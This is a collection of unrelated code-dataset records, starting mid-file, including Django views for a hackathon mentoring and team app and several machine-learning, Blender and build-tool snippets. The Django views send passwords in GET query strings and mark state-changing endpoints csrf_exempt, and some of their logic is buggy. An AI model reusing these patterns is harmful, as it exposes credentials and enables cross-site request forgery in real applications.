float(noteJudger)\n team.save()\n\n return HttpResponse(\"OK\")\n\n\ndef select_mentor(request):\n \"\"\"\n Esta função já partirá do princípio que a lista dos mentores assim como seu identificado já foi enviado para o front-end, logo o front-end apenas irá realizar uma requisição\n dado o id e o nome do mentor junto com a data da mentoria disponível.\n \"\"\"\n\n # obtendo os dados\n user = request.user\n mentor_name = request.GET.get('mentor_name')\n mentor_id = request.GET.get('mentor_id')\n meeting_data = request.GET.get('data_meeting') # str\n student = Student.objects.get(user_id=request.user)\n team = student.team_id\n\n # Verificar se a mentoria já foi selecionada.\n data_info_formated = parser.parse(meeting_data)\n mentor_model = Mentor.objects.get(id=mentor_id)\n\n try:\n # Captura todas as mentorias disponíveis do mentor\n mentoring_model = Mentoring.objects.get(\n mentor=mentor_model, team=None, time_meeting=data_info_formated)\n except:\n return HttpResponse(\"Mentoria não encontrada\")\n mentoring_model.team = team\n mentoring_model.save()\n return HttpResponse(\"Mentoria registrada!\")\n\n # Inserindo a nova mentoria\n\n newMentoring = Mentoring(mentor=mentor_model,\n team=team, time_meeting=data_info_formated)\n\n newMentoring.save()\n return HttpResponse(\"Meeting made\")\n # return JsonResponse(data, safe = False)\n\n\n@csrf_exempt\ndef show_disposable_mentors(request):\n \"\"\"\n Esta função fará a seleção dos mentores disponível para então mostrar para o usuário\n \"\"\"\n\n # Precisamos checar se a mentorias selecionada faz parte do setor de interesse do usuário.\n user_model = request.user\n team_model = Student.objects.get(user_id=user_model).team_id\n\n if team_model is None:\n return HttpResponse(\"O usuário inserido não possui um time\")\n #challenge_id = mentorias_model.mentor_id.challenge_id\n\n mentorias_model = Mentoring.objects.filter(\n mentor_id__challenge_id=team_model.challenge_id\n ) # filtrando apenas as mentorias que estão livres\n #disposable_meetings = mentorias_model.filter(mentor_id__challenge_id = team_model.challenge_id)\n #values = list(disposable_meetings.objects.values())\n\n # mentor_info = mentorias_model.\n values = list(mentorias_model.values())\n filter_ = [v['mentor_id'] for v in values]\n\n for ind, v in enumerate(filter_):\n first_name = Mentor.objects.get(id=v).user.first_name\n last_name = Mentor.objects.get(id=v).user.last_name\n values[ind][\"name\"] = f\"{first_name} {last_name}\"\n #response = Mentor.objects.get(id__in = filter_)\n\n #mentor_filter = Mentor.objects.filter(id__in = filter_).get(\"user_id\")\n\n # return HttpResponse(\"OK\")\n return JsonResponse(values, safe=False)\n\n\ndef insert_data_meeting(request):\n \"\"\"\n Função que fará a inserção dos horário de mentoria\n \"\"\"\n user_model = request.user # usuário precisa ser um mentor\n meeting_hour = request.GET.get('meeting_hour')\n try:\n mentor_model = Mentor.objects.get(user=user_model)\n except:\n return HttpResponse(\"Usuário não é um mentor\")\n from datetime import datetime\n #datetime_formated = datetime.strptime(date = meeting_hour,format = \"%d/%m/%Y %H:%M:%S\")\n datetime_formated = parser.parse(meeting_hour)\n time_meeting = datetime_formated\n Mentoring.objects.create(\n mentor=mentor_model, team=None, time_meeting=time_meeting)\n\n return HttpResponse(\"WORK!\")\n\n\n@csrf_exempt\ndef integrate_team(request):\n user_model = request.user\n # Ger Json data {\"Team\" : [\"e-mail1\",\"e-mail2\"]}\n data = json.loads(request.body)\n emails = 
data['email']\n student_model = Student.objects.get(user_id=user_model)\n team_model = student_model.team_id\n lof_status = []\n\n #anothers_user_models = User.objects.filter(email__in = emails)\n\n #students_user_models = Student.objects.filter(user_id__in = anothers_user_models)\n\n #students_user_models_without_team = students_user_models.filter(team_id = None)\n\n # students_user_models_with_team = students_user_models.exclude(team_id = None) # Finish this part to return the people who were not added to the team\n #students_user_models_without_team.update(team_id = team_model)\n\n for email in emails:\n # try:\n\n another_user_model = User.objects.get(email=email)\n\n another_student_model = Student.objects.get(user_id=another_user_model)\n\n another_student_model.team_id = team_model\n another_student_model.save()\n\n lof_status.append({\n \"name\": another_user_model.first_name + \" \" + another_user_model.last_name,\n \"status\": \"integrated\"\n })\n\n resposta = JsonResponse(lof_status, safe=False)\n #resposta[\"Access-Control-Allow_Origin\"] = \"*\"\n #resposta[\"Access-Control-Allow_Methods\"] = ['GET','POST','OPTION']\n #resposta[\"Access-Control-Allow_Headers\"] = \"*\"\n\n return resposta\n\n\n@csrf_exempt\ndef getout_team(request):\n user_model = request.user\n student_model = Student.objects.get(user_id=user_model)\n\n if student_model.isLeader:\n QueryStudentSet = Student.objects.filter(team_id=student_model.team_id)\n QueryStudentSet.team_id = None\n student_model.team_id.delete()\n\n student_model.team_id = None\n student_model.save()\n return HttpResponse(\"OK\")\n\n\n@csrf_exempt\ndef create_team(request):\n \"\"\"\n When the team is created, it is automatically associated with a challenge\n \"\"\"\n\n user_model = request.user\n challenge_name = request.GET.get(\"challenge\")\n try:\n challenge_model = Challenge.objects.get(name=challenge_name)\n except Challenge.DoesNotExist:\n return JsonResponse({\n \"status\": \"challenge cannot be found\"\n })\n\n student_model = Student.objects.get(user_id=user_model)\n team_model = Team.objects.create(challenge_id=challenge_model.id)\n student_model.team_id = team_model\n student_model.save()\n\n return JsonResponse({\n \"status\": \"OK\"\n })\n\n\ndef create_challenge(request):\n # For now, challenge creation is done directly on the admin page\n\n challenge_name = request.GET.get(\"challenge\")\n check_exists = Challenge.objects.filter(name=challenge_name)\n\n if len(check_exists):\n return JsonResponse({\n 'status': 'challenge already exists'\n })\n else:\n\n challenge_model = Challenge.objects.create(name=challenge_name)\n return JsonResponse({\n \"status\": \"ok\"\n })\n\n\n@csrf_exempt\ndef loginUser(request):\n\n username = request.GET.get('username')\n password = request.GET.get('password') # assumes the password is sent along with the username\n logout(request)\n user = authenticate(request, username=username, password=password)\n\n if user is not None:\n login(request, user)\n return JsonResponse({\n \"status\": \"ok\",\n })\n else:\n return JsonResponse({\n })\n\n\n@csrf_exempt\ndef register(request):\n username = request.GET.get('username')\n email = request.GET.get('email')\n first_name = request.GET.get('first_name')\n last_name = request.GET.get('last_name')\n category = request.GET.get('category')\n # this will be the challenge id, since on the login screen the judge receives the challenge id\n challenge_id = request.GET.get('challenge')\n challenge = challenge_id\n check_user = User.objects.filter(email=email)\n\n # Does the user already exist?\n if len(check_user):\n # login(request,usuario)\n return JsonResponse({\n 'status': 'User already exists',\n }, 
safe=False)\n else:\n user_model = User.objects.create_user(username=username, email=email) # create the missing user before setting its fields\n user_model.first_name = first_name\n user_model.last_name = last_name\n user_model.save()\n\n if category == 'student':\n student_model = Student.objects.create(\n user_id=user_model, team_id=None, isLeader=False)\n elif category == 'judger':\n challenge = Challenge.objects.get(id=challenge_id)\n judger_model = Judge.objects.create(\n user_id=user_model, challenge=challenge)\n\n elif category == 'mentor':\n # mentor_model = Mentor.objects.create(user = user_model, challenge)\n challenge = Challenge.objects.get(id=challenge_id)\n mentor_model = Mentor.objects.create(\n user=user_model, challenge=challenge)\n\n return JsonResponse({\n 'status': 'created'\n }, safe=False)\n","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"441836235","text":"def get_coach_data(filename):\n try:\n with open(filename) as f:\n data = f.readline()\n List = data.strip().split(\",\")\n dic = {}\n dic[\"Name\"] = List.pop(0)\n dic[\"Dob\"] = List.pop(0)\n dic[\"Times\"] = str(sorted(set(sanitize(t) for t in List))[0:3])\n return dic\n except IOError as error:\n print(\"File error: \" + str(error))\n return (None)\n\ndef sanitize(item):\n if '-' in item:\n spliter = \"-\"\n elif ':' in item:\n spliter = \":\"\n else:\n return item\n (first, second) = item.split(spliter)\n return (first + \".\" + second)\n\nsarah = get_coach_data(\"sarah2.txt\")\nprint (sarah[\"Name\"] + \"'s fastest times are: \" + sarah[\"Times\"])\n","sub_path":"Head-First Python/Chapter-6/function5.py","file_name":"function5.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"137085731","text":"# Given an array A of strings made only from lowercase letters, return a list of all characters that show up in all strings within the list (including duplicates). 
For example, if a character occurs 3 times in all strings but not 4 times, you need to include that character three times in the final answer.\n\n# You may return the answer in any order.\n\n \n\n# Example 1:\n\n# Input: [\"bella\",\"label\",\"roller\"]\n# Output: [\"e\",\"l\",\"l\"]\n# Example 2:\n\n# Input: [\"cool\",\"lock\",\"cook\"]\n# Output: [\"c\",\"o\"]\n\nclass Solution:\n def commonChars(self, A: List[str]) -> List[str]:\n chr_cnt = self.cntChrs(A[0]) \n for w in A:\n new_cnt = {}\n curr_cnt = self.cntChrs(w)\n for c, cnt in curr_cnt.items():\n if c in chr_cnt: \n new_cnt[c] = min(cnt, chr_cnt[c]) \n chr_cnt = new_cnt \n res = [] \n for c, cnt in chr_cnt.items():\n if cnt == 1: \n res.append(c)\n else:\n for _ in range(cnt):\n res.append(c)\n return res \n\n def cntChrs(self, w: str) -> dict: \n d = {}\n for c in w: \n if c not in d:\n d[c] = 0\n d[c] += 1 \n return d\n","sub_path":"dailyProb/prob1002.py","file_name":"prob1002.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"45777154","text":"from typing import Dict\n\nfrom models.test_suite_models.test_suite import TestSuite\n\n\nclass TraceStatistics:\n def __init__(self, test_suite: TestSuite):\n self.ground_truth_cardinality = len(test_suite.logic_methods_faulty)\n self.ground_truth_mid_to_trace_count = test_suite.get_trace_count_for_ground_truth()\n self.ground_truth_trace_count = sum(self.ground_truth_mid_to_trace_count.values())\n self.total_test_methods = len(test_suite.test_methods)\n\n def gen_value_maps(self):\n value_map = {\n 'Ground Truth Total Trace Count': self.ground_truth_trace_count,\n 'Ground Truth Average Trace Count': self.ground_truth_trace_count / len(self.ground_truth_mid_to_trace_count),\n 'Ground Truth Traces Per Method': ','.join(str(v) for v in self.ground_truth_mid_to_trace_count.values()),\n 'Total Number of Tests': self.total_test_methods,\n # 'Total Tests hitting faulty components': ,\n # 'Average Tests hitting faulty components': ,\n }\n return value_map\n","sub_path":"models/test_suite_models/trace_statistics.py","file_name":"trace_statistics.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"331746640","text":"from rng import RNG\n\nclass Trace:\n def __init__(self):\n self.vars = {}\n self.vars_frozen = {}\n self.isOutputFrozen = False\n self.isAllFrozen = False\n self.isNoneFrozen = True\n def __call__(self, *args):\n name = args[0]\n if self.isNoneFrozen:\n if name in self.vars:\n return self.vars[name].getValue()\n else:\n return RNG(name,self)\n elif self.isAllFrozen:\n if name in self.vars_frozen:\n return self.vars[name].getValue()\n else:\n self.vars_frozen[name] = \"\"\n return RNG(name,self,False)\n elif self.isOutputFrozen:\n if name in self.vars_frozen:\n return self.vars[name].getValue()\n elif not self.vars[name].isOutput:\n self.vars_frozen[name] = \"\"\n return RNG(name,self)\n else:\n self.vars_frozen[name] = \"\"\n return RNG(name,self,False)\n else:\n raise\n\n def density(self):\n return reduce(lambda x,y:x*y, [self.vars[x].density() for x in self.vars], 1)\n def get_latent_densities(self):\n return [(x, self.vars[x].density()) for x in self.vars if not self.vars[x].isOutput]\n def get_output_densities(self):\n return [(x, self.vars[x].density()) for x in self.vars if self.vars[x].isOutput]\n def get_latent_values(self):\n return [(x, self.vars[x].getValue()) for x in self.vars 
if not self.vars[x].isOutput]\n def get_output_values(self):\n return [(x, self.vars[x].getValue()) for x in self.vars if self.vars[x].isOutput]\n\n def tag_random_outputs(self, names):\n for name in names:\n if name not in self.vars:\n raise\n else:\n self.vars[name].isOutput = True\n def freeze_all(self):\n self.vars_frozen = {}\n self.isOutputFrozen = False\n self.isAllFrozen = True\n self.isNoneFrozen = False\n def freeze_output(self):\n self.vars_frozen = {}\n self.isOutputFrozen = True\n self.isAllFrozen = False\n self.isNoneFrozen = False\n def freeze_none(self):\n self.vars_frozen = {}\n self.isOutputFrozen = False\n self.isAllFrozen = False\n self.isNoneFrozen = True\n","sub_path":"code/trace.py","file_name":"trace.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"215916615","text":"#\n# Dependencies:\n# RemoveExtraWhitespace\n#\n\nfrom norlinter.rule import SingleLineRule\n\nMEMORY = [\"copy\", \"strong\", \"weak\", \"assign\"]\nACCESS = [\"readwrite\", \"readonly\"]\n\nclass FixProperties (SingleLineRule):\n def format(self, line):\n formatted = line.strip()\n if not formatted.startswith(\"@property\"): return line\n # Doesn't have attributes\n if formatted.replace(\" \", \"\")[9] != \"(\":\n return \"{};\".format(formatted.strip(\"; \"))\n start = formatted.find(\"(\") # Already checked w/ previous condition\n end = formatted.find(\")\", start)\n assert end != -1, \"property is not properly defined\"\n attributes = formatted[start+1:end]\n attributes = attributes.replace(\" \", \"\").split(\",\")\n ordered = []\n # nonatomic is always first\n if \"nonatomic\" in attributes[:]:\n ordered.append(\"nonatomic\")\n attributes.remove(\"nonatomic\")\n # Put memory first\n for attribute in attributes[:]:\n if attribute in MEMORY:\n ordered.append(attribute)\n attributes.remove(attribute)\n # Access restrictions second\n for attribute in attributes[:]:\n if attribute in ACCESS:\n ordered.append(attribute)\n attributes.remove(attribute)\n # Everything else is last\n for attribute in attributes[:]:\n ordered.append(attribute)\n return \"@property ({}) {};\".format(\", \".join(ordered), formatted[end+1:].strip(\"; \"))\n\n def getErrorDescription(self):\n return \"Invalid formatted property declaration\"\n","sub_path":"norlinter/source/norlinter/rule/FixProperties.py","file_name":"FixProperties.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"164151915","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 2 13:09:20 2017\n\n@author: 凯风\n\"\"\"\n\nfrom gensim.models import Word2Vec\nimport jieba,logging\nimport nltk\nimport numpy as np \nimport pandas as pd \n\n'''\n 通过深度学习,将生成每个词的向量。\n 具体的研究看论文或blog吧\n https://segmentfault.com/a/1190000008173404\n 这是一篇关于官网给出的教程的翻译,感觉还不错\n'''\n\n\n# 日志配置\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\n\n# 读取数据\nfilename = 'C:/Users/dell/Desktop/金瓶梅.txt'\ndata = open(filename,encoding='utf-8',errors='ignore').readlines()\n\n# 特征处理\ndata = data[256:]\ndata = list(filter(lambda s : len(s) > 3 , data))\ndata = list(map(lambda s : s.strip() , data))\nwords = map(lambda s : list(jieba.cut(s)) , data)\nall_words = []\nfor each in words:\n all_words.extend(each)\n\n# 获取停用词清单\nstopwords_english = nltk.corpus.stopwords.words('english')\nfilename = 
'D:/mygit/ML_Method_summary/Text_Operation/Basic_Operation/stopword.txt'\nstopwords_chinese = [line.rstrip() for line in open(filename)]\n\n# 停词处理\nword_stoped_middle = [i for i in all_words if i not in stopwords_english]\nword_stoped = [i for i in word_stoped_middle if i not in stopwords_chinese]\n\nn = np.unique(word_stoped,return_counts=True)\ns = pd.Series(data = n[1],index = n[0])\ns = s[6:]\nbook_words = s.sort_values(ascending=False)\nbook_words.values\nbook_words.index\n\n# 出现的词大于100次,且为长度大于1的\nbook_words[book_words > 200]\n\n# word2vec\n# 这里最好传入的是迭代器,不要传入其他类型的数据结构,会训练速度\nmodel = Word2Vec(word_stoped)\nmodel['西']\nmodel.most_similar(positive=['西'],topn=20)\n\n\n# 还有很多方法,可以调用\n\n'''\n sentences 句子,要向量化的对象\n size 每个词的向量维数\n alpha 1 \n window 1\n min_count 忽略一些词,用于修建内部的字典\n max_vocab_size \n sample 1\n seed 1\n workers 装了Cpython有效,用于加快训练\n min_alpha 1\n sg 1\n hs 1\n negative 1\n cbow_mean 1\n iter 1\n null_word 1\n trim_rule 1\n sorted_vocab 1\n batch_words 1\n'''\n","sub_path":"Text_Operation/Basic_Operation/word2vec.py","file_name":"word2vec.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"178188757","text":"# coding=utf-8\n# author=yphacker\n\nimport numpy as np\nfrom conf import config\nfrom conf import bert_model_config\nfrom utils.bert import tokenization\n\n\ndef get_bert_param_lists(texts):\n \"\"\"\n 将数据转换成Bert能够使用的格式\n input_ids:根据BERT-Base-Chinese checkpoint中的vocabtxt中每个字出现的index,将训练文本中的每一个字替换为vocab.txt中的index,需要添加开始CLS和结束SEP\n input_masks:包含开始CLS和结束SEP有字就填1\n segment_ids:seq2seq类任务同时传入两句训练关联训练数据时,有意义,传入一句训练数据则都为0\n 以上三个list需要用0补齐到max_seq_length的长度\n \"\"\"\n # token 处理器,主要作用就是 分字,将字转换成ID。vocab_file 字典文件路径\n tokenizer = tokenization.FullTokenizer(vocab_file=bert_model_config.bert_vocab_path)\n input_ids_list = []\n input_masks_list = []\n segment_ids_list = []\n for text in texts:\n single_input_id, single_input_mask, single_segment_id = \\\n convert_single_example_simple(config.max_seq_length, tokenizer, text)\n input_ids_list.append(single_input_id)\n input_masks_list.append(single_input_mask)\n segment_ids_list.append(single_segment_id)\n input_ids = np.asarray(input_ids_list, dtype=np.int32)\n input_masks = np.asarray(input_masks_list, dtype=np.int32)\n segment_ids = np.asarray(segment_ids_list, dtype=np.int32)\n return input_ids, input_masks, segment_ids\n\n\ndef bert_bacth_iter(x, y, batch_size=config.batch_size):\n input_ids, input_masks, segment_ids = x\n index = np.random.permutation(len(y))\n n_batches = len(y) // batch_size\n for batch_index in np.array_split(index, n_batches):\n batch_input_ids, batch_input_masks, batch_segment_ids, batch_y = \\\n input_ids[batch_index], input_masks[batch_index], segment_ids[batch_index], y[batch_index]\n yield (batch_input_ids, batch_input_masks, batch_segment_ids), batch_y\n\n\ndef batch_iter(x, y, batch_size=config.batch_size):\n \"\"\"生成批次数据\"\"\"\n data_len = len(x)\n num_batch = int((data_len - 1) / batch_size) + 1\n\n indices = np.random.permutation(np.arange(data_len))\n x_shuffle = x[indices]\n y_shuffle = y[indices]\n\n for i in range(num_batch):\n start_id = i * batch_size\n end_id = min((i + 1) * batch_size, data_len)\n yield x_shuffle[start_id:end_id], y_shuffle[start_id:end_id]\n\n\ndef get_sequence_length(x_batch):\n \"\"\"\n Args:\n x_batch:a batch of input_data\n Returns:\n sequence_lenghts: a list of acutal length of every senuence_data in input_data\n \"\"\"\n sequence_lengths = []\n for x in x_batch:\n 
actual_length = np.sum(np.sign(x))\n sequence_lengths.append(actual_length)\n return sequence_lengths\n\n\ndef export_word2vec_vectors(vocab):\n \"\"\"\n Args:\n vocab: word_to_id\n word2vec_dir:file path of have trained word vector by word2vec\n trimmed_filename:file path of changing word_vector to numpy file\n Returns:\n save vocab_vector to numpy file\n\n \"\"\"\n infile = open(config.vector_word_filename, 'r')\n voc_size, vec_dim = None, None\n embeddings = None\n for i, line in enumerate(infile):\n if i == 0:\n voc_size, vec_dim = map(int, line.split(' '))\n embeddings = np.zeros([len(vocab), vec_dim])\n continue\n items = line.split(' ')\n word = items[0]\n # vec = np.asarray(items[1:], dtype='float32')\n vec = np.asarray(items[1:])\n if word in vocab:\n word_idx = vocab[word]\n embeddings[word_idx] = np.asarray(vec)\n np.savez_compressed(config.vector_word_npz, embeddings=embeddings)\n infile.close()\n\n\ndef get_training_word2vec_vectors(filename):\n \"\"\"\n Args:\n filename:numpy file\n Returns:\n data[\"embeddings\"]: a matrix of vocab vector\n \"\"\"\n with np.load(filename) as data:\n return data[\"embeddings\"]\n\n\ndef _truncate_seq_pair(tokens_a, tokens_b, max_length):\n \"\"\"Truncates a sequence pair in place to the maximum length.\"\"\"\n\n # This is a simple heuristic which will always truncate the longer sequence\n # one token at a time. This makes more sense than truncating an equal percent\n # of tokens from each, since if one sequence is very short then each token\n # that's truncated likely contains more information than a longer sequence.\n while True:\n total_length = len(tokens_a) + len(tokens_b)\n if total_length <= max_length:\n break\n if len(tokens_a) > len(tokens_b):\n tokens_a.pop()\n else:\n tokens_b.pop()\n\n\ndef convert_single_example_simple(max_seq_length,\n tokenizer, text_a, text_b=None):\n tokens_a = tokenizer.tokenize(text_a)\n tokens_b = None\n if text_b:\n tokens_b = tokenizer.tokenize(text_b) # 这里主要是将中文分字\n if tokens_b:\n # 如果有第二个句子,那么两个句子的总长度要小于 max_seq_length - 3\n # 因为要为句子补上[CLS], [SEP], [SEP]\n _truncate_seq_pair(tokens_a, tokens_b, max_seq_length - 3)\n else:\n # 如果只有一个句子,只用在前后加上[CLS], [SEP] 所以句子长度要小于 max_seq_length - 2\n if len(tokens_a) > max_seq_length - 2:\n tokens_a = tokens_a[0:(max_seq_length - 2)]\n\n # 转换成bert的输入,注意下面的type_ids 在源码中对应的是 segment_ids\n # (a) 两个句子:\n # tokens: [CLS] is this jack ##son ##ville ? [SEP] no it is not . [SEP]\n # type_ids: 0 0 0 0 0 0 0 0 1 1 1 1 1 1\n # (b) 单个句子:\n # tokens: [CLS] the dog is hairy . 
[SEP]\n # type_ids: 0 0 0 0 0 0 0\n #\n # 这里 \"type_ids\" 主要用于区分第一个第二个句子。\n # 第一个句子为0,第二个句子是1。在预训练的时候会添加到单词的的向量中,但这个不是必须的\n # 因为[SEP] 已经区分了第一个句子和第二个句子。但type_ids 会让学习变的简单\n\n tokens = []\n segment_ids = []\n tokens.append(\"[CLS]\")\n segment_ids.append(0)\n for token in tokens_a:\n tokens.append(token)\n segment_ids.append(0)\n tokens.append(\"[SEP]\")\n segment_ids.append(0)\n if tokens_b:\n for token in tokens_b:\n tokens.append(token)\n segment_ids.append(1)\n tokens.append(\"[SEP]\")\n segment_ids.append(1)\n input_ids = tokenizer.convert_tokens_to_ids(tokens) # 将中文转换成ids\n # 创建mask\n input_mask = [1] * len(input_ids)\n # 对于输入进行补0\n while len(input_ids) < max_seq_length:\n input_ids.append(0)\n input_mask.append(0)\n segment_ids.append(0)\n assert len(input_ids) == max_seq_length\n assert len(input_mask) == max_seq_length\n assert len(segment_ids) == max_seq_length\n return input_ids, input_mask, segment_ids # 对应的就是创建bert模型时候的input_ids,input_mask,segment_ids 参数\n","sub_path":"英文垃圾信息分类/src/utils/model_utils.py","file_name":"model_utils.py","file_ext":"py","file_size_in_byte":7097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"647047319","text":"import bpy\n\n\ndef object_prepare():\n\tops_ob = bpy.ops.object\n\tops_ob.make_single_user(object=True, obdata=True)\n\tops_ob.convert(target=\"MESH\")\n\n\ndef mesh_selection(ob, select_action):\n\tcontext = bpy.context\n\tsce = context.scene\n\tobj = context.active_object\n\tops = bpy.ops\n\tops_me = bpy.ops.mesh\n\tops_ob = ops.object\n\n\n\tdef mesh_cleanup():\n\t\tops_me.select_all(action=\"SELECT\")\n\t\tops_me.delete_loose()\n\t\tops_me.select_all(action=\"SELECT\")\n\t\tops_me.remove_doubles(threshold=0.0001)\n\t\tops_me.fill_holes(sides=0)\n\t\tops_me.normals_make_consistent()\n\n\n\tsce.objects.active = ob\n\tops_ob.mode_set(mode=\"EDIT\")\n\n\tmesh_cleanup()\n\tops_me.select_all(action=select_action)\n\n\tops_ob.mode_set(mode=\"OBJECT\")\n\tsce.objects.active = obj\n\n\ndef modifier_boolean(obj, ob, mode):\n\tmd = obj.modifiers.new('Booltron', 'BOOLEAN')\n\tmd.show_viewport = False\n\tmd.show_render = False\n\tmd.operation = mode\n\tmd.object = ob\n\n\tbpy.ops.object.modifier_apply(modifier=\"Booltron\")\n\tbpy.context.scene.objects.unlink(ob)\n\tbpy.data.objects.remove(ob)\n\n\ndef boolean_optimized(mode):\n\tcontext = bpy.context\n\tobj = context.active_object\n\n\tobject_prepare()\n\n\tobj.select = False\n\tobs = context.selected_objects\n\tob = obs[0]\n\n\tif len(obs) != 1:\n\t\tcontext.scene.objects.active = ob\n\t\tbpy.ops.object.join()\n\t\tcontext.scene.objects.active = obj\n\n\tmesh_selection(obj, 'DESELECT')\n\tmesh_selection(ob, 'SELECT')\n\tmodifier_boolean(obj, ob, mode)\n\tobj.select = True\n\n\ndef boolean_each(mode):\n\tcontext = bpy.context\n\tobj = context.active_object\n\n\tobject_prepare()\n\n\tobj.select = False\n\tobs = context.selected_objects\n\n\tmesh_selection(obj, 'DESELECT')\n\tfor ob in obs:\n\t\tmesh_selection(ob, 'SELECT')\n\t\tmodifier_boolean(obj, ob, mode)\n\tobj.select = True\n\n\n\n\n\n\ndef union():\n\tcontext = bpy.context\n\tmode = 'UNION'\n\n\n\tdef separate():\n\t\tops = bpy.ops\n\t\tops_ob = ops.object\n\t\tops_ob.mode_set(mode=\"EDIT\")\n\t\tops.mesh.separate(type=\"LOOSE\")\n\t\tops_ob.mode_set(mode=\"OBJECT\")\n\n\n\tboolean_optimized(mode)\n\tseparate()\n\tif len(context.selected_objects) != 1:\n\t\tboolean_each(mode)\n\n\ndef intersect():\n\tmode = 'INTERSECT'\n\tboolean_each(mode)\n\n\ndef difference():\n\tmode = 
'DIFFERENCE'\n\tboolean_optimized(mode)\n\n\ndef separate():\n\tcontext = bpy.context\n\tsce = context.scene\n\tobj = context.active_object\n\n\n\tdef object_duplicate(ob):\n\t\tops_ob = bpy.ops.object\n\t\tops_ob.select_all(action=\"DESELECT\")\n\t\tops_ob.select_pattern(pattern=ob.name)\n\t\tops_ob.duplicate()\n\t\treturn context.selected_objects[0]\n\n\n\tobject_prepare()\n\n\tobj.select = False\n\tob = context.selected_objects[0]\n\n\tobj_copy = object_duplicate(obj)\n\tob_copy = object_duplicate(ob)\n\n\tmode = 'INTERSECT'\n\tmesh_selection(obj_copy, 'SELECT')\n\tmesh_selection(ob, 'DESELECT')\n\tsce.objects.active = ob\n\tmodifier_boolean(ob, obj_copy, mode)\n\n\tmode = 'DIFFERENCE'\n\tmesh_selection(ob_copy, 'SELECT')\n\tmesh_selection(obj, 'DESELECT')\n\tsce.objects.active = obj\n\tmodifier_boolean(obj, ob_copy, mode)\n\tobj.select = True\n","sub_path":"scripts/addons_extern/blender-addon-booltron-master/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"26439748","text":"import numpy as np\n\nclass StackingFeature(object):\n\tdef __init__(self):\n\t\tpass\n\n\tdef concatArray(self,train,test,train_joint_array,test_joint_array):\n\t\ttemp_train_jointed_array = train_joint_array.reshape(1,len(train_joint_array))\n\t\ttemp_test_jointed_array = test_joint_array.reshape(1,len(test_joint_array))\n\t\tresult_train = np.hstack((train,temp_train_jointed_array))\n\t\tresult_test = np.hstack((test,temp_test_jointed_array))\n\t\treturn result_train,result_test\n\n\tdef mean(self,train,test):\n\t\ttrain_joint_array = np.mean(train,axis=1)\n\t\ttest_joint_array = np.mean(test,axis=1)\n\t\treturn self.concatArray(train, test, train_joint_array, test_joint_array)\n\n\tdef std(self,train,test):\n\t\ttrain_joint_array = np.std(train,axis=1)\n\t\ttest_joint_array = np.std(test,axis=1)\n\t\treturn self.concatArray(train, test, train_joint_array, test_joint_array)\n\n\tdef convert(self,train,test,mean_flag=True,std_flag=True,tsne_flag=True):\n\t\ttrain_array = train\n\t\ttest_array = test\n\t\t\n\t\tif mean_flag:\n\t\t\ttrain_array,test_array = self.mean(train, test)\n\n\t\tif std_flag:\n\t\t\ttrain_array,test_array = self.std(train, test)\n\n\t\treturn train_array,test_array","sub_path":"sample/StackingFeature.py","file_name":"StackingFeature.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"102598010","text":"# coding=utf-8\n# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).\n# Licensed under the Apache License, Version 2.0 (see LICENSE).\n\nfrom __future__ import (absolute_import, division, generators, nested_scopes, print_function,\n unicode_literals, with_statement)\n\nimport logging\n\nfrom pants.backend.jvm.targets.exportable_jvm_library import ExportableJvmLibrary\nfrom pants.base.payload import Payload\nfrom pants.base.payload_field import PrimitiveField\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass JavaWireLibrary(ExportableJvmLibrary):\n \"\"\"Generates a stub Java library from protobuf IDL files.\"\"\"\n\n def __init__(self,\n payload=None,\n service_writer=None,\n service_writer_options=None,\n roots=None,\n registry_class=None,\n enum_options=None,\n no_options=None,\n **kwargs):\n \"\"\"\n :param string service_writer: the name of the class to pass as the --service_writer option to\n the Wire compiler.\n :param list 
service_writer_options: A list of options to pass to the service writer\n :param list roots: passed through to the --roots option of the Wire compiler\n :param string registry_class: fully qualified class name of RegistryClass to create. If in\n doubt, specify com.squareup.wire.SimpleServiceWriter\n :param list enum_options: list of enums to pass to as the --enum-enum_options option, # optional\n :param boolean no_options: boolean that determines if --no_options flag is passed\n \"\"\"\n payload = payload or Payload()\n payload.add_fields({\n 'service_writer': PrimitiveField(service_writer or None),\n 'service_writer_options': PrimitiveField(service_writer_options or []),\n 'roots': PrimitiveField(roots or []),\n 'registry_class': PrimitiveField(registry_class or None),\n 'enum_options': PrimitiveField(enum_options or []),\n 'no_options': PrimitiveField(no_options or False),\n })\n\n if service_writer_options:\n logger.warn('The service_writer_options flag is ignored.')\n\n super(JavaWireLibrary, self).__init__(payload=payload, **kwargs)\n self.add_labels('codegen')\n","sub_path":"src/python/pants/backend/codegen/targets/java_wire_library.py","file_name":"java_wire_library.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"530491596","text":"import os\r\nimport logging\r\nimport wrapt\r\n\r\n@wrapt.decorator\r\ndef log_args(wrapped, instance, args, kwargs):\r\n log = logging.getLogger() # 